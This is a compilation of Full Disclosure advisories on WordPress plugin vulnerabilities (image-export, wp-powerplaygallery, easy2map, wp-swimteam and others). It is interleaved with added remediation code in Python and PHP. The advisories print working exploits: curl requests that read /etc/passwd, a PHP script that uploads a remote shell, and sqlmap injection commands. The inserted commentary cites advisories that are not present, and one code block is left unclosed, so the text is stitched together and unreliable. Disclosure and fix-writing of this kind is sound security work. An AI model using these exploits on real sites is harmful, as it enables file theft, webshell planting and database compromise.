Advisory: http://www.vapid.dhs.org/advisory.php?v=138
[FD] Remote file download vulnerability in Wordpress Plugin image-export v1.1
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander

Description: Image Export plugin can help you selectively download images uploaded by an administrator.

Vulnerability: The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only. And line 8 attempts to unlink the file after being downloaded. This script could be used to delete files out of the wordpress directory if file permissions allow.

    1 <?php
    2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
    3     $file = $_GET['file'];
    4
    5     header( 'Content-Type: application/zip' );
    6     header( 'Content-Disposition: attachment; filename="' . $file . '"' );
    7     readfile( $file );
    8     unlink( $file );
    9
    10    exit;
    11 }
    12 ?>

CVEID: TBD

Exploit Code:

    $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd

Advisory: http://www.vapid.dhs.org/advisory.php?v=135
[FD] Remote file upload vulnerability SQLi in wordpress plugin wp-powerplaygallery v3.3
Title: Remote file upload vulnerability SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plug...@wordpress.org

Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible with iphone and ipads. It is also allow us to use it as a widget. You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad and iphones.

Vulnerability:

1. Ability to create directories outside of the upload path by using ../:

Lines 56-59 of upload.php:

    56 // Create target dir
    57 if (!file_exists($targetDir)) {
    58     @mkdir($targetDir);
    59 }

2. Arbitrary file uploads to a path in the web root directory:

Lines 138-160 of uploads.php don't verify what types of files are allowed or where they should be placed:

    138 // Open temp file
    139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
    140     die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
    141 }
    142
    143 if (!empty($_FILES)) {
    144     if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
    145         die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}');
    146     }
    147
    148     // Read binary input stream and append it to temp file
    149     if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
    150         die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    151     }
    152 } else {
    153     if (!$in = @fopen("php://input", "rb")) {
    154         die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    155     }
    156 }
    157
    158 while ($buff = fread($in, 4096)) {
    159     fwrite($out, $buff);
    160 }

3. SQL injection

Lines 131-135 of upload.php fail to handle user input appropriately either by sanitizing or parameterizing it. Injection points are any GET/POST to albumid or name.

    131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` )
    132     VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
    133
    134 $wpdb->query($query);
    135

CVEID:
OSVDB:

Exploit Code:

    <?php
    /*Remote shell upload exploit for wp-powerplaygallery v3.3 */
    /*Larry W. Cashdollar @_larry0
    6/27/2015
    albumid needs to be a numeric value matching an existing album number, 1 is probably a good start
    but you can enumerate these by using curl, and looking for redirect 301 responses:
    e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
    -301 exists else 404 doesn't.
    shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php
    */


    $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
    $file_name_with_full_path = '/var/www/shell.php';

    echo "POST to $target_url $file_name_with_full_path";
    $post = array('albumid'=>'foo' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL,$target_url);
    curl_setopt($ch, CURLOPT_POST,1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    $result=curl_exec ($ch);
    curl_close ($ch);
    echo "<hr>";
    echo $result;
    echo "<hr>";
    ?>

SQLi PoC:

    $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql
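The two Huge-IT posts, the powerplaygallery INSERT above and the easy2map sprintf() queries further down all have the same shape: a request value is spliced into the SQL string, so the database parses whatever the client sent. The block below is an added example, not code from any of the plugins; it uses Python with sqlite3 standing in for the Joomla and WordPress database layers, with a constructed products table, to show the concatenated query beside a bound-parameter version and an integer check on the id in front of it. The WordPress and Joomla calls named in the comments ($wpdb->prepare(), $db->quote()) are the real ones; the table and rows are constructed.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the plugins' product/image tables."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, catalog_id INTEGER, name TEXT)")
    con.executemany("INSERT INTO products (catalog_id, name) VALUES (?, ?)",
                    [(1, "public widget"), (2, "private gadget"), (2, "private gizmo")])
    return con


def products_vulnerable(con, catalog_id):
    """The pattern in the advisories ($query->where('catalog_id =' . $catalog_id)):
    the request value is glued into the WHERE clause, so whatever it contains
    is parsed as SQL."""
    sql = "SELECT name FROM products WHERE catalog_id = " + str(catalog_id) + " ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def products_parameterized(con, catalog_id):
    """Fix: bind the value. The driver hands it to the engine as data, never as
    SQL text. WordPress equivalent: $wpdb->prepare("... WHERE catalog_id = %d", $id);
    Joomla: an (int) cast or $db->quote() before the value reaches the query."""
    sql = "SELECT name FROM products WHERE catalog_id = ? ORDER BY id"
    return [row[0] for row in con.execute(sql, (catalog_id,))]


def products_validated(con, raw_catalog_id):
    """Belt and braces for an id parameter: insist on a decimal integer before
    the value gets anywhere near the query, then bind it."""
    if not isinstance(raw_catalog_id, str) or not raw_catalog_id.isdigit():
        raise ValueError("catalog_id must be a non-negative decimal integer")
    return products_parameterized(con, int(raw_catalog_id))


def demo():
    """Run each variant with a normal id and with a constructed tautology
    ('1 OR 1=1') and return the rows each one gave back."""
    con = make_db()
    hostile = "1 OR 1=1"
    out = {
        "vulnerable_normal": products_vulnerable(con, "1"),
        "vulnerable_hostile": products_vulnerable(con, hostile),
        "parameterized_hostile": products_parameterized(con, hostile),
        "parameterized_normal": products_parameterized(con, 1),
        "validated_normal": products_validated(con, "2"),
    }
    try:
        products_validated(con, hostile)
        out["validated_hostile"] = "accepted"
    except ValueError:
        out["validated_hostile"] = "rejected"
    return out


if __name__ == "__main__":
    for key, rows in demo().items():
        print(f"{key}: {rows}")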
[FD] Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134

Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.

Vulnerability: The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:

    50     $file = urldecode($args['file']) ;
    51     $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;
    52
    53     while (!feof($fh))
    54         $txt .= fread($fh, 1024) ;
    55
    56     // Clean up the temporary file - permissions
    57     // may prevent this from succeedeing so use the '@'
    58     // to suppress any messages from PHP.
    59
    60     @unlink($file) ;
    61 }
    62
    63 $filename = urldecode($args['filename']) ;
    64 $contenttype = urldecode($args['contenttype']) ;
    65
    66 // Tell browser to expect a text file of some sort (usually txt or csv)
    67
    68 header(sprintf('Content-Type: application/%s', $contenttype)) ;
    69 header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ;
    70 print $txt ;

CVEID:
OSVDB:

Exploit Code:

    $ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
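The download handlers in the image-export and wp-swimteam posts (a client-supplied path handed straight to readfile()/fopen() and then unlink()) and the upload handlers in the Mobile App Native, mailcwp and wp-powerplaygallery posts (no caller check, no type check, and a client-chosen destination directory) are two faces of the same missing control: the server, not the request, must decide which files are reachable. The following is an added Python example, not code from any of the plugins: confine() resolves a requested name under a fixed root and rejects anything that escapes it (absolute paths, ../ segments, and a symlink planted inside the directory), and check_upload() layers the three checks the upload handlers skipped on top of it. The User class, the extension allow-list and the magic-byte table are this example's own assumptions; the sandbox directory, the secret file and the sample file contents are constructed.

```python
import os
import tempfile

# Extensions a gallery or attachment handler has any business storing; anything
# the web server might execute is simply not on the list.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "csv"}
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl"}
# Leading bytes of the binary formats we accept, so "shell.png" holding PHP source is refused.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8", "pdf": b"%PDF-"}


class User:
    """Hypothetical principal standing in for the WordPress login/capability
    check the vulnerable handlers never performed."""
    def __init__(self, is_authenticated, capabilities=()):
        self.is_authenticated = is_authenticated
        self.capabilities = set(capabilities)

    def can(self, capability):
        return self.is_authenticated and capability in self.capabilities


def confine(base_dir, user_path):
    """Resolve user_path under base_dir; return the real path, or None if it escapes.
    realpath() collapses '..' and follows symlinks, so '/etc/passwd',
    '../wp-config.php' and a link inside base_dir pointing outside it all fail."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    return target if os.path.commonpath([base, target]) == base else None


def check_upload(user, client_filename, data, upload_root):
    """Return the path an upload may be written to, or raise: who is asking,
    what is being stored, and where it goes (the server picks the directory)."""
    if user is None or not user.can("upload_files"):
        raise PermissionError("upload requires an authenticated user with upload_files")
    name = os.path.basename(client_filename.replace("\\", "/"))   # drop any directory part
    if not name or name.startswith("."):                           # also blocks .htaccess
        raise ValueError("bad file name")
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension '.{ext}' not allowed")
    if any(p in SCRIPT_EXTENSIONS for p in parts[1:-1]):   # shell.php.png on lax server configs
        raise ValueError("script extension embedded in file name")
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        raise ValueError("content does not match extension")
    dest = confine(upload_root, name)
    if dest is None:
        raise ValueError("destination escapes upload root")
    return dest


def _outcome(fn, *args):
    """'ok:<basename>' for an accepted request, else the exception class name."""
    try:
        return "ok:" + os.path.basename(fn(*args))
    except (PermissionError, ValueError) as exc:
        return type(exc).__name__


def demo():
    """Constructed sandbox: an uploads directory, a secret outside it, and a
    symlink inside it pointing at the secret. Returns the verdict per request."""
    root = tempfile.mkdtemp(prefix="upload-demo.")
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    secret = os.path.join(root, "wp-config.php")
    open(secret, "w").close()
    os.symlink(secret, os.path.join(uploads, "escape"))

    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16          # constructed minimal PNG header
    php = b"<?php echo 1; ?>"                           # constructed script body
    editor = User(True, {"upload_files"})
    anon = User(False)
    return {
        "download_absolute": confine(uploads, "/etc/passwd"),
        "download_traversal": confine(uploads, "../wp-config.php"),
        "download_symlink": confine(uploads, "escape"),
        "download_ok": os.path.basename(confine(uploads, "photo.png") or ""),
        "upload_anonymous": _outcome(check_upload, anon, "photo.png", png, uploads),
        "upload_php": _outcome(check_upload, editor, "shell.php", php, uploads),
        "upload_double_ext": _outcome(check_upload, editor, "shell.php.png", png, uploads),
        "upload_fake_png": _outcome(check_upload, editor, "shell.png", php, uploads),
        "upload_traversal_name": _outcome(check_upload, editor, "../../photo.png", png, uploads),
        "upload_ok": _outcome(check_upload, editor, "photo.png", png, uploads),
    }


if __name__ == "__main__":
    for key, verdict in demo().items():
        print(f"{key}: {verdict!r}")
```

For a download endpoint the only change needed is `confine(UPLOAD_ROOT, requested)` before readfile(), and the same call makes the unlink() in image-export harmless, because a None result never reaches it. On the upload side, note that the client-supplied directory (mailcwp's upload_dir, powerplaygallery's targetDir) simply does not appear as an input: the destination is the handler's own root plus a basename.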
[FD] SQL Injection in easy2map-photos wordpress plugin v1.09
Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130

Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.

Vulnerability: The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren't parameterized or sanitizing user input.

48 $wpdb->query(sprintf("UPDATE $mapsTable
49 SET PolyLines = '%s'
50 WHERE ID = '%s';", $PolyLines, $mapID));

218 $wpdb->query(sprintf("
219 UPDATE $mapsTable
220 SET TemplateID = '%s',
221 MapName = '%s',
222 Settings = '%s',
223 CSSValues = '%s',
224 CSSValuesPhoto = '%s',
225 CSSValuesMap = '%s',
226 MapHTML = '%s',
227 IsActive = 1
228 WHERE ID = %s;",
229 $_REQUEST['mapTemplateName'],
230 $_REQUEST['mapName'],
231 urldecode($_REQUEST['mapSettingsXML']),
232 urldecode($_REQUEST["parentCSSXML"]),
233 urldecode($_REQUEST["photoCSSXML"]),
234 urldecode($_REQUEST["mapCSSXML"]),
235 urldecode($_REQUEST["mapHTML"]), $mapID));

238 //this is a map insert
239 if (!$wpdb->query(sprintf("
240 INSERT INTO $mapsTable(
241 TemplateID,
242 MapName,
243 DefaultPinImage,
244 Settings,
245 LastInvoked,
246 PolyLines,
247 CSSValues,
248 CSSValuesPhoto,
249 CSSValuesMap,
250 MapHTML,
251 IsActive
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', 0);",
253 $_REQUEST['mapTemplateName'],
254 $_REQUEST['mapName']

331 $wpdb->query(sprintf("
332 UPDATE $mapsTable
333 SET MapName = '%s'
334 IsActive = 1
335 WHERE ID = %s;",
336 $_REQUEST['mapName'],
337 $mapID));

Also in MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:

if (!file_exists($imagesDirectory)) {
    mkdir($imagesDirectory);
}

CVEID: 2015-4615 2015-4617
OSVDB:

Exploit Code:

$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie="COOKIE HERE" --level=5 --risk=3
[FD] Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com

Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.

Vulnerability: The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded.

<?php
require_once("../../../../wp-admin/admin.php");

header('Content-disposition: attachment; filename='.$_GET['filename']);
header('Content-type: application/pdf');
readfile(HAET_INVOICE_PATH.$_GET['filename']);
?>

You'll have to rename the download file via

mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd

as the filename is set to the download filename with path.

CVEID: Requested TBD
OSVDB: TBD

Exploit Code:

$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd
[FD] Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/mdc-youtube-downloader
Vendor: https://profiles.wordpress.org/mukto90/
Vendor Notified: 2015-07-01, removed vulnerable code.
Vendor Contact: n.mu...@gmail.com

Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site.

Vulnerability: The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system, allowing sensitive files to be downloaded:

$file_name = $_GET['file'];

// make sure it's a file before doing anything!
if(is_file($file_name)) {
    .
    .
    .
    switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
        case 'pdf': $mime = 'application/pdf'; break;
        case 'zip': $mime = 'application/zip'; break;
        case 'jpeg':
        case 'jpg': $mime = 'image/jpg'; break;
        default: $mime = 'application/force-download';
    }
    header('Pragma: public'); // required
    header('Expires: 0'); // no cache
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
    header('Cache-Control: private',false);
    header('Content-Type: '.$mime);
    header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: '.filesize($file_name));// provide file size
    header('Connection: close');
    readfile($file_name); // push it out
    exit();

CVEID: Requested, TBD.
OSVDB: TBD.

Exploit Code:

$ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
[FD] SQL Injection in easy2map wordpress plugin v1.24
Title: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131

Description: The easiest tool available for creating custom great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.

Vulnerability: The following lines in Function.php use sprintf() to format queries being sent to the database; this doesn't provide proper sanitization of user input or properly parameterize the query to the database.

90 $wpdb->query(sprintf("UPDATE $mapsTable
91 SET PolyLines = '%s'
92 WHERE ID = '%s';", $PolyLines, $mapID));
.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s',
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName'])))
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));

In MapPinImageSave.php, code isn't sanitized when creating a directory, allowing ../ to create files outside of the intended directory:

$imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {

    if (!file_exists($imagesDirectory)) {
        mkdir($imagesDirectory);
    }

CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:

Exploit Code:

$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3
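The sprintf()-built queries in the easy2map, easy2map-photos and wp-powerplaygallery advisories above all splice request values straight into SQL text. As an added example (not code from any of those plugins or from the advisory author), here is the same map save written with $wpdb->prepare() and $wpdb->insert(), plus the pin-image directory built from a validated integer. It assumes WordPress is loaded; the table name easy2map_maps and the nonce action are assumptions, the column names come from the excerpts above.

```php
<?php
// Added example, not easy2map's own code: bind request values as data
// instead of formatting them into the SQL string with sprintf().
// Assumes WordPress is loaded ($wpdb, absint(), wp_unslash() etc. exist).

/**
 * Update an existing map or insert a new one. Returns the map ID on
 * success and 0 on failure.
 */
function e2m_save_map_secure(array $items, int $map_id): int {
    global $wpdb;
    $maps_table = $wpdb->prefix . 'easy2map_maps';   // assumed table name

    // Unslash once; no manual quoting is needed because every %s placeholder
    // is escaped by prepare() and every %d is cast to an integer.
    $template = sanitize_text_field(wp_unslash($items['mapTemplateName'] ?? ''));
    $name     = sanitize_text_field(wp_unslash($items['mapName'] ?? ''));
    $settings = wp_unslash($items['mapSettingsXML'] ?? '');
    $css      = wp_unslash($items['mapCSSXML'] ?? '');
    $html     = wp_kses_post(wp_unslash($items['mapHTML'] ?? ''));

    if ($map_id > 0) {
        // A mapName such as "' or 1=1;" becomes a literal string value here.
        $sql = $wpdb->prepare(
            "UPDATE {$maps_table}
                SET TemplateID = %s, MapName = %s, Settings = %s,
                    CSSValues = %s, MapHTML = %s, IsActive = 1,
                    LastInvoked = CURRENT_TIMESTAMP
              WHERE ID = %d",
            $template, $name, $settings, $css, $html, $map_id
        );
        return $wpdb->query($sql) === false ? 0 : $map_id;
    }

    // $wpdb->insert() builds the INSERT from an array and applies the given
    // format per column, so no SQL string is assembled in plugin code at all.
    $ok = $wpdb->insert(
        $maps_table,
        [
            'TemplateID' => $template,
            'MapName'    => $name,
            'Settings'   => $settings,
            'CSSValues'  => $css,
            'MapHTML'    => $html,
            'IsActive'   => 0,
        ],
        ['%s', '%s', '%s', '%s', '%s', '%d']
    );
    return $ok ? (int) $wpdb->insert_id : 0;
}

/**
 * The pin-image directory from MapPinImageSave.php, with map_id forced to
 * a positive integer so "../" sequences can never reach the path.
 */
function e2m_pin_upload_dir(string $raw_map_id): ?string {
    $id = absint($raw_map_id);          // "../../x" -> 0, "11" -> 11
    if ($id === 0) {
        return null;
    }
    return WP_CONTENT_DIR . '/uploads/easy2map/images/map_pins/uploaded/' . $id . '/';
}

// Typical admin-ajax entry point: check capability and nonce before touching
// the database; the query layer above is the second line of defence.
if (!current_user_can('edit_posts')
    || !check_ajax_referer('e2m_save_map', '_wpnonce', false)) {  // assumed nonce action
    wp_send_json_error('forbidden', 403);
}
wp_send_json_success([
    'mapID' => e2m_save_map_secure($_POST, absint($_POST['mapID'] ?? 0)),
]);
```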
[FD] Remote file download vulnerability in download-zip-attachments v1.0
Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129

Description: Download all attachments from the post into a zip file.

Vulnerability: The code in download-zip-attachments/download.php makes no checks to verify the download path is within the specified upload directory.

<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
    define('WP_USE_THEMES', false);
    require('../../../wp-load.php');
    require "create_zip_file.php";
    $uploads = wp_upload_dir();
    $tmp_location = $uploads['path']."/".$_REQUEST['File'];
    //echo $tmp_location;
    $zip = new CreateZipFile;
    $zip->forceDownload($tmp_location,false);
    unlink($tmp_location);
    exit;
}

CVEID: 2015-4704
OSVDB:

Exploit Code:

http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd
[FD] Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:

Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.

Vulnerability: The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory:

try{
    $dbname = $_GET["dbname"];
    $dumpfname = $_GET["dumpfname"];
    $backup_folder = $_GET["backup_folder"];
}catch (Exception $e){}

if(empty($backup_folder)){
    $backup_folder="backup/";
}
echo $dumpfname;
if (file_exists($dumpfname)) {
    // zip the dump file
    $name=$dbname . "_" . date("Y-m-d");
    $zipfname = $backup_folder.$name.".zip";
    $zip = new ZipArchive();
    if($zip->open($zipfname,ZIPARCHIVE::CREATE)) {
        $zip->addFile($dumpfname,$dumpfname);
        $zip->close();
    }
    // read zip file and send it to standard output
    if (file_exists($zipfname)) {
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename='.basename($zipfname));
        flush();
        readfile($zipfname);

CVEID: 2015-4703
OSVDB:

Exploit Code:

curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=." http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip
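The wp-swimteam, wp-ecommerce-shop-styling, mdc-youtube-downloader, download-zip-attachments and wp-instance-rename advisories above share one defect: a client-supplied name is passed to fopen()/readfile() with no check that it stays inside the intended directory. As an added example (not code from any of those plugins or from the advisory author), here is a download handler that confines the request to one base directory with realpath(), requires an authenticated, capable user, and derives the content type from a server-side allowlist rather than a request parameter. It assumes WordPress is loaded; the plugin-exports directory, the capability and the nonce action are assumptions.

```php
<?php
// Added example, not code from any of the plugins above: confine every
// download to one base directory. Assumes WordPress is loaded so that
// current_user_can(), wp_verify_nonce(), status_header() and
// wp_upload_dir() are available.

/**
 * Resolve $requested inside $base_dir and return the real path only if the
 * result stays inside $base_dir. Returns null for "../" traversal, absolute
 * paths, NUL bytes, symlinks that point outside, and non-existent files.
 */
function confined_path(string $base_dir, string $requested): ?string {
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    // Reject NUL bytes and anything carrying a directory component: both
    // "../../etc/passwd" and "/etc/passwd" differ from their basename.
    if (strpos($requested, "\0") !== false || $requested !== basename($requested)) {
        return null;
    }
    // realpath() follows symlinks, so a link inside $base that points at
    // /etc/passwd resolves outside it and fails the prefix check below.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Content types come from the file's extension, never from a client
// "contenttype" parameter.
const DOWNLOAD_TYPES = [
    'csv' => 'text/csv',
    'txt' => 'text/plain',
    'pdf' => 'application/pdf',
    'zip' => 'application/zip',
];

function serve_download(string $base_dir): void {
    // Authentication first: the file system is never touched for anonymous
    // requests or requests without a valid nonce.
    if (!current_user_can('manage_options')                       // assumed capability
        || !wp_verify_nonce($_REQUEST['_wpnonce'] ?? '', 'plugin_download')) {  // assumed action
        status_header(403);
        exit('Forbidden');
    }
    $file = confined_path($base_dir, (string) ($_GET['file'] ?? ''));
    if ($file === null) {
        status_header(404);
        exit('Not found');
    }
    $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
    if (!isset(DOWNLOAD_TYPES[$ext])) {
        status_header(415);
        exit('Unsupported type');
    }
    header('Content-Type: ' . DOWNLOAD_TYPES[$ext]);
    // basename() of an already-confined path: no path or CRLF reaches the
    // Content-Disposition header.
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}

// Entry point: only files under the plugin's own export directory (assumed
// location) can ever be served.
$uploads = wp_upload_dir();
serve_download($uploads['basedir'] . '/plugin-exports');
```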
[FD] Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
